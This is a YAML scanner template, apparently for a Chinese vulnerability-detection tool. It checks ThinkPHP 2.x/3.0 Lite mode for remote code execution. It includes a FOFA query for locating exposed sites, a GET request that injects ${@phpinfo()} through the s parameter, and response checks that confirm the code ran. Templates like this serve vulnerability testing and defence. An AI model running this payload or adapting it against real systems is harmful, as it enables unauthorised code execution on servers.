product: ThinkPHP
vName: ThinkPHP 2 3 - Remote Code Execution
type: 代码执行
vID: [ ]
level: 3
vDesc: ThinkPHP 2.x and 3.0 in Lite mode are susceptible to remote code execution via the s parameter. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
version: ''
note: ''
search:
  FOFA: app="ThinkPHP"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?s=/index/index/name/$%7B@phpinfo()%7D
    verify:
      logic: and
      check:
        - body:
            value:
              - PHP Version
              - Build Date
              - System
            logic: and
        - status: 200